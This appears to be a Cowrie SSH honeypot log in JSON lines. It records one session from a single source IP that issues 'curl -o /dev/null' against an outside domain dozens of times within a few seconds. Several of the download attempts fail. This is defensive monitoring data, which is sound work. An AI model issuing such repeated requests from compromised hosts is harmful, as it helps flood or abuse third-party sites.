{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.426148Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.441337Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:13.463081Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.464612Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.479335Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:13.502367Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.503232Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.528067Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:13.545406Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.546187Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:13.582859Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.583739Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.607478Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:13.620942Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.621755Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.647777Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:13.668894Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.669753Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.691233Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:13.707149Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.708117Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.726452Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:13.745549Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.746418Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.778332Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:13.794817Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.795604Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.821506Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:13.833363Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.834236Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:13.872606Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.873635Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.903815Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:13.919157Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.920111Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.941911Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:13.960517Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.961409Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:13.999169Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.000624Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:14.039462Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.040474Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.063478Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:14.088123Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.088847Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:14.126902Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.128403Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:14.165466Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.166630Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:14.207544Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.208605Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.238408Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:14.245220Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.246391Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:14.284130Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.284970Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.313999Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:14.321457Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.322278Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:14.360273Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.361220Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:14.401666Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.402780Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.430225Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:14.442848Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.444371Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.472119Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:14.495205Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.496089Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.510282Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:14.533583Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.534594Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:14.572481Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.573304Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.598124Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:14.611140Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.612168Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.637363Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:14.652504Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.653271Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.675585Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:14.691586Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.692502Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.719755Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:14.729471Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.730341Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:14.769435Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.770367Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.795839Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:14.806921Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.807809Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:14.845639Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.846499Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:14.895582Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.896501Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.912374Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:14.933457Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.934247Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.951610Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:14.971053Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:14.972301Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.002131Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:15.009071Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.009963Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.050149Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:15.058604Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.059623Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:15.096261Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.097755Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.125799Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:15.134899Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.135706Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:15.172590Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.173599Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:15.210096Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.211154Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.243761Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:15.248389Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.249108Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.281668Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:15.297008Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.297777Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:15.335338Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.336104Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:15.372368Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.372934Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
